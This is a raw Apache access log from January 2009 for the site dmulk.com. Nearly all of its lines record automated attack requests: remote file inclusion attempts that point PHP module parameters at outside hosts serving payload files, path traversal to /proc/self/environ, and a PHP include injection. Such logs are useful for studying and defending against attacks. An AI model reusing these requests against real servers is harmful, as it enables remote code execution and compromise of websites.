125.246.65.68 - - [04/Jan/2009:10:04:14 -0800] "GET /errors.php?error=http://spy.becauseofus.com/tibby/i?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
125.246.65.68 - - [04/Jan/2009:10:04:14 -0800] "GET /logs/errors.php?error=http://spy.becauseofus.com/tibby/i?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
125.246.65.68 - - [04/Jan/2009:10:04:14 -0800] "GET /logs/access_080127.log//modules/vwar/admin/admin.php?vwar_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
125.246.65.68 - - [04/Jan/2009:10:04:14 -0800] "GET /modules/vwar/admin/admin.php?vwar_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
125.246.65.68 - - [04/Jan/2009:10:04:14 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
125.246.65.68 - - [04/Jan/2009:10:04:15 -0800] "GET /modules/vwar/admin/admin.php?vwar_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
125.246.65.68 - - [04/Jan/2009:10:04:15 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
211.235.245.121 - - [04/Jan/2009:10:04:33 -0800] "GET /logs/access_080613.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.stormpages.com/benu/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
202.60.67.10 - - [04/Jan/2009:10:04:37 -0800] "GET /index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://mhasbi.com/safe.cmd.txt? HTTP/1.1" 200 95022 "-" "libwww-perl/5.810" "www.dmulk.com"
202.60.67.10 - - [04/Jan/2009:10:04:37 -0800] "GET /index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://mhasbi.com/safe.cmd.txt? HTTP/1.1" 200 95006 "-" "libwww-perl/5.810" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:10:04:39 -0800] "GET /logs/access_080404.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:10:04:39 -0800] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:10:04:40 -0800] "GET /index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 200 95113 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
207.182.137.218 - - [04/Jan/2009:10:04:42 -0800] "GET /logs/access_080714.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:10:04:52 -0800] "GET /logs/access_080404.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:10:04:52 -0800] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:10:04:52 -0800] "GET /index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 200 95113 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
128.121.79.26 - - [04/Jan/2009:10:04:54 -0800] "GET /logs/access_080327.log/errors.php?error=http://jeticu.com/ktmlpro/includes/ktedit/ctrl.txt????%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
128.121.79.26 - - [04/Jan/2009:10:04:54 -0800] "GET /errors.php?error=http://jeticu.com/ktmlpro/includes/ktedit/ctrl.txt????%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
205.231.144.152 - - [04/Jan/2009:10:04:55 -0800] "GET /logs/access_080901.log/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.lazar.ru/manager/processors/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
128.121.79.26 - - [04/Jan/2009:10:04:56 -0800] "GET /logs/access_080207.log/errors.php?error=http://jeticu.com/ktmlpro/includes/ktedit/ctrl.txt????%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
128.121.79.26 - - [04/Jan/2009:10:04:57 -0800] "GET /logs/errors.php?error=http://jeticu.com/ktmlpro/includes/ktedit/ctrl.txt????%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
205.231.144.152 - - [04/Jan/2009:10:04:58 -0800] "GET /index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.lazar.ru/manager/processors/test.txt? HTTP/1.1" 200 95281 "-" "libwww-perl/5.803" "www.dmulk.com"
207.182.137.218 - - [04/Jan/2009:10:05:00 -0800] "GET /logs/access_080404.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
205.231.144.152 - - [04/Jan/2009:10:05:00 -0800] "GET /logs/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.lazar.ru/manager/processors/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:10:05:44 -0800] "GET /logs/access_080404.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:10:05:44 -0800] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:10:05:44 -0800] "GET /index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 200 95113 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
211.235.245.121 - - [04/Jan/2009:10:05:51 -0800] "GET /logs/access_080613.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.stormpages.com/benu/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
190.196.5.189 - - [04/Jan/2009:10:06:04 -0800] "GET /logs/access_081116.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.alternativesud.com/ressources/cms/modules/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
128.121.79.26 - - [04/Jan/2009:10:06:07 -0800] "GET /logs/access_080327.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://jeticu.com/ktmlpro/includes/ktedit/ctrl.txt????%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
128.121.79.26 - - [04/Jan/2009:10:06:07 -0800] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://jeticu.com/ktmlpro/includes/ktedit/ctrl.txt????%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
128.121.79.26 - - [04/Jan/2009:10:06:08 -0800] "GET /logs/access_080207.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://jeticu.com/ktmlpro/includes/ktedit/ctrl.txt????%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
128.121.79.26 - - [04/Jan/2009:10:06:08 -0800] "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://jeticu.com/ktmlpro/includes/ktedit/ctrl.txt????%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.160.96.54 - - [04/Jan/2009:10:06:11 -0800] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://secure.burtonhosting.com/billing//include/reports/include/ooid.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.160.96.54 - - [04/Jan/2009:10:06:11 -0800] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://secure.burtonhosting.com/billing//include/reports/include/ooid.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.199.205.47 - - [04/Jan/2009:10:06:17 -0800] "GET /logs/access_080330.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.caverna.kit.net/scans/bit.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
200.160.96.54 - - [04/Jan/2009:10:06:18 -0800] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://secure.burtonhosting.com/billing//include/reports/include/ooid.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.160.96.54 - - [04/Jan/2009:10:06:19 -0800] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://secure.burtonhosting.com/billing//include/reports/include/ooid.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
190.196.5.189 - - [04/Jan/2009:10:06:22 -0800] "GET /logs/access_080714.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.alternativesud.com/ressources/cms/modules/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
94.23.7.173 - - [04/Jan/2009:10:06:47 -0800] "GET /logs/access_080214.log//?mosConfig_absolute_pathhttp://conexionw.com/.../.thumb/image.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
222.66.239.241 - - [04/Jan/2009:10:06:51 -0800] "GET /logs/access_081114.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.aukcio.dzsar.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.182.137.218 - - [04/Jan/2009:10:06:57 -0800] "GET /logs/access_071215.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
64.128.80.16 - - [04/Jan/2009:10:06:59 -0800] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://flowskatepark.org/WebCalendar-1.0.4//includes/compress.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.128.80.16 - - [04/Jan/2009:10:06:59 -0800] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://flowskatepark.org/WebCalendar-1.0.4//includes/compress.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
202.60.67.10 - - [04/Jan/2009:10:07:08 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://mhasbi.com/safe.cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.182.137.218 - - [04/Jan/2009:10:07:11 -0800] "GET /logs/access_071222.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
207.182.137.218 - - [04/Jan/2009:10:07:12 -0800] "GET /logs/access_071215.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
207.182.137.218 - - [04/Jan/2009:10:07:12 -0800] "GET /logs/access_071222.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
66.249.73.140 - - [04/Jan/2009:10:07:21 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4362M.JPG HTTP/1.1" 200 0 "-" "Googlebot-Image/1.0" "dmulk.com"
64.128.80.16 - - [04/Jan/2009:10:07:30 -0800] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://flowskatepark.org/WebCalendar-1.0.4//includes/compress.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.128.80.16 - - [04/Jan/2009:10:07:30 -0800] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://flowskatepark.org/WebCalendar-1.0.4//includes/compress.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.1.215.164 - - [04/Jan/2009:10:07:50 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "www.dmulk.com"
94.23.7.173 - - [04/Jan/2009:10:07:51 -0800] "GET /logs/access_080214.log//?mosConfig_absolute_path=http://conexionw.com/.../.thumb/image.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
85.236.53.4 - - [04/Jan/2009:10:08:18 -0800] "GET /logs/access_081117.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://plainsimple.org/test/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.236.53.4 - - [04/Jan/2009:10:08:18 -0800] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://plainsimple.org/test/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.236.53.4 - - [04/Jan/2009:10:08:18 -0800] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://plainsimple.org/test/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.232.109.160 - - [04/Jan/2009:10:08:36 -0800] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.mouche.be/components/com_banners/errors.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.232.109.160 - - [04/Jan/2009:10:08:37 -0800] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.mouche.be/components/com_banners/errors.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.14.80.68 - - [04/Jan/2009:10:08:47 -0800] "GET /logs/access_081114.log%20/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.karensscrappin.com.au/moodledata/1/recipefolio/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.14.80.68 - - [04/Jan/2009:10:08:47 -0800] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.karensscrappin.com.au/moodledata/1/recipefolio/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.14.80.68 - - [04/Jan/2009:10:08:47 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.karensscrappin.com.au/moodledata/1/recipefolio/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.236.53.4 - - [04/Jan/2009:10:09:05 -0800] "GET /logs/access_081128.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://plainsimple.org/test/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.18.157.227 - - [04/Jan/2009:10:09:24 -0800] "GET /logs/access_081207.log/modules/My_eGallery/index.php?basepath=http://www.novoftp.xpg.com.br/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.18.157.227 - - [04/Jan/2009:10:09:25 -0800] "GET /logs/access_081207.log/modules/My_eGallery/index.php?basepath=http://www.novoftp.xpg.com.br/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.14.80.68 - - [04/Jan/2009:10:09:38 -0800] "GET /logs/access_081016.log/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.karensscrappin.com.au/moodledata/1/recipefolio/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.18.157.227 - - [04/Jan/2009:10:09:40 -0800] "GET /logs/access_080404.log/modules/My_eGallery/index.php?basepath=http://www.novoftp.xpg.com.br/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.18.157.227 - - [04/Jan/2009:10:09:41 -0800] "GET /logs/access_080404.log/modules/My_eGallery/index.php?basepath=http://www.novoftp.xpg.com.br/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.107.47.80 - - [04/Jan/2009:10:10:04 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://portal.morpace.com/portal/demo/templates/id5.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.14.80.68 - - [04/Jan/2009:10:10:07 -0800] "GET /logs/access_081022.log/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.karensscrappin.com.au/moodledata/1/recipefolio/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.182.137.218 - - [04/Jan/2009:10:10:08 -0800] "GET /logs/access_080714.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
62.141.37.54 - - [04/Jan/2009:10:10:15 -0800] "GET /administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://brant.3x.ro/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.182.137.218 - - [04/Jan/2009:10:10:18 -0800] "GET /logs/access_080404.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
205.231.144.152 - - [04/Jan/2009:10:10:33 -0800] "GET /logs/access_080530.log/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.lazar.ru/manager/processors/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
222.236.47.182 - - [04/Jan/2009:10:11:11 -0800] "GET /logs/access_080412.log//modules/Forums/admin/errors.php?error=http://jeticu.com/ktmlpro/includes/ktedit/ctrl.txt????%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.236.47.182 - - [04/Jan/2009:10:11:11 -0800] "GET /modules/Forums/admin/errors.php?error=http://jeticu.com/ktmlpro/includes/ktedit/ctrl.txt????%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.236.47.182 - - [04/Jan/2009:10:11:11 -0800] "GET /logs//modules/Forums/admin/errors.php?error=http://jeticu.com/ktmlpro/includes/ktedit/ctrl.txt????%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.236.47.182 - - [04/Jan/2009:10:11:30 -0800] "GET /logs/access_080819.log%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://plainsimple.org/test/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
78.110.174.10 - - [04/Jan/2009:10:11:33 -0800] "GET /logs/access_081016.log/errors.php?error=http://www.manuelymar.net/rtve/uploads/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
78.110.174.10 - - [04/Jan/2009:10:11:33 -0800] "GET /errors.php?error=http://www.manuelymar.net/rtve/uploads/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
78.110.174.10 - - [04/Jan/2009:10:11:33 -0800] "GET /logs/errors.php?error=http://www.manuelymar.net/rtve/uploads/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
78.110.174.10 - - [04/Jan/2009:10:11:56 -0800] "GET /logs/access_081022.log/errors.php?error=http://www.manuelymar.net/rtve/uploads/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.135.56.104 - - [04/Jan/2009:10:12:12 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://portal.morpace.com/portal/demo/templates/id5.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.135.56.104 - - [04/Jan/2009:10:12:12 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://portal.morpace.com/portal/demo/templates/id5.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.236.47.182 - - [04/Jan/2009:10:12:46 -0800] "GET /logs/access_081117.log//modules/Forums/admin/errors.php?error=http://jeticu.com/ktmlpro/includes/ktedit/ctrl.txt????%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.246.20.140 - - [04/Jan/2009:10:13:21 -0800] "GET /logs/access_080413.log/auth.header.inc.php?da_path=http://62.94.24.124/cerignola/home/CuteNews/...??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
216.246.20.140 - - [04/Jan/2009:10:13:21 -0800] "GET /auth.header.inc.php?da_path=http://62.94.24.124/cerignola/home/CuteNews/...??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
216.246.20.140 - - [04/Jan/2009:10:13:21 -0800] "GET /logs/auth.header.inc.php?da_path=http://62.94.24.124/cerignola/home/CuteNews/...??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
79.148.238.69 - - [04/Jan/2009:10:13:35 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://portal.morpace.com/portal/demo/templates/id5.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.148.238.69 - - [04/Jan/2009:10:13:36 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://portal.morpace.com/portal/demo/templates/id5.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
78.110.174.10 - - [04/Jan/2009:10:13:45 -0800] "GET /logs/access_081114.log%20/errors.php?error=http://www.manuelymar.net/rtve/uploads/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
212.95.39.220 - - [04/Jan/2009:10:14:04 -0800] "GET /logs/access_081114.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www2.pensierotascabile.it/web/media/rss/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.204.231.202 - - [04/Jan/2009:10:14:20 -0800] "GET //calendar.php?s=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.14.80.68 - - [04/Jan/2009:10:14:47 -0800] "GET /kmitaadmin/kmitam/htmlcode.php?file=http://www.karensscrappin.com.au/moodledata/1/recipefolio/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.14.80.68 - - [04/Jan/2009:10:14:47 -0800] "GET /logs/access_080509.log/kmitaadmin/kmitam/htmlcode.php?file=http://www.karensscrappin.com.au/moodledata/1/recipefolio/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.14.80.68 - - [04/Jan/2009:10:14:47 -0800] "GET /logs/access_081003.log/kmitaadmin/kmitam/htmlcode.php?file=http://www.karensscrappin.com.au/moodledata/1/recipefolio/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.14.80.68 - - [04/Jan/2009:10:14:47 -0800] "GET /logs/kmitaadmin/kmitam/htmlcode.php?file=http://www.karensscrappin.com.au/moodledata/1/recipefolio/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
94.23.3.220 - - [04/Jan/2009:10:15:16 -0800] "GET /main.php?page=http://www.csjh.tpc.edu.tw/~sw/board/idbr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:10:15:48 -0800] "GET /logs/access_071215.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:10:15:48 -0800] "GET /logs/access_071215.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:10:15:48 -0800] "GET /logs/access_071215.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:10:16:08 -0800] "GET /logs/access_071222.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:10:16:08 -0800] "GET /logs/access_071222.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
